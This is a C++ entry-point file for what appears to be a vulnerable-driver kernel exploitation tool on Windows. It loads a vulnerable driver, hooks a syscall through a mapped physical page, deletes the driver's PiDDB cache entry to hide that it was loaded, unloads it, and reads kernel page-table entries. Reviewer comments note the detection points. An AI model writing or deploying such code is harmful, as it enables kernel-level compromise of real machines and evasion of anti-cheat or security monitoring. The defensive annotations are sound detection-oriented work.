#include <cstdio>
#include <iostream>

#include "kernel_ctx/kernel_ctx.h"
#include "mem_ctx/mem_ctx.hpp"
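// Demo entry point: loads the vulnerable driver, builds a kernel context over
// it, scrubs the driver's PiDDB cache entry, unloads the driver, and finally
// reads and prints the PDE that maps ntoskrnl in the current process.
//
// Returns 0 on success, -1 if the driver could not be loaded or unloaded.
// argc/argv are unused.
//
// NOTE(review): from a defender's point of view each step here is a
// high-signal event — a user-mode process loading a driver, a modification of
// the PiDDB cache table, and a user-mode process reading kernel page-table
// entries. Driver-load telemetry and PiDDB cache consistency checks are the
// natural detection points for this class of tool.
int __cdecl main(int argc, char** argv)
{
    if (!nasa::load_drv())
    {
        std::printf("[!] unable to load vulnerable driver... run as admin?\n");
        return -1;
    }

    // kernel_ctx's constructor presumably installs the syscall hook through
    // the mapped physical page (not visible in this file); the two lines below
    // only report what it recorded.
    nasa::kernel_ctx kernel;
    // NOTE(review): %p requires a void*; confirm psyscall_func's value type.
    std::printf("[+] %s mapped physical page -> 0x%p\n",
                nasa::syscall_hook.first.data(),
                nasa::psyscall_func.load());
    // Widen explicitly so the format specifier matches regardless of
    // nt_page_offset's declared integer width.
    std::printf("[+] %s page offset -> 0x%llx\n",
                nasa::syscall_hook.first.data(),
                static_cast<unsigned long long>(nasa::nt_page_offset));

    // clear piddb cache table entry for vulnerable driver...
    // drv_key and raw_driver come from the included headers. The C-style cast
    // on raw_driver is kept because its declared type (possibly const) is not
    // visible here.
    const auto driver_timestamp =
        util::get_file_header((void*)raw_driver)->TimeDateStamp;
    if (kernel.clear_piddb_cache(nasa::drv_key, driver_timestamp))
    {
        std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
    }
    else
    {
        std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");
    }

    if (!nasa::unload_drv())
    {
        std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
        return -1;
    }

    // NOTE(review): `kernel` is still used below after unload_drv(); this only
    // works if the kernel_ctx hook outlives the driver — confirm against
    // kernel_ctx's implementation.
    const unsigned my_pid = GetCurrentProcessId();
    const virt_addr_t ntoskrnl_base{
        reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) };

    std::cout << "[+] my pid: " << std::hex << my_pid << std::endl;
    std::cout << "[+] kernel base: " << std::showbase << std::hex << ntoskrnl_base.value << std::endl;

    nasa::mem_ctx my_proc(kernel, my_pid);
    const auto ntoskrnl_pde = my_proc.get_pde(ntoskrnl_base.value);

    // ntoskrnl is allocated in 2mb large pages :)
    // The PDE fields are presumably bitfields of a 64-bit entry; cast them to
    // a fixed type so the printf specifier matches their promoted type (an
    // x64 pfn does not fit the unsigned int that %x expects).
    std::printf("[+] page present -> %d\n",
                static_cast<int>(ntoskrnl_pde.second.present));
    std::printf("[+] page frame number -> 0x%llx\n",
                static_cast<unsigned long long>(ntoskrnl_pde.second.pfn));
    std::printf("[+] large page -> %d\n",
                static_cast<int>(ntoskrnl_pde.second.page_size));
    std::cin.get();
    return 0;
}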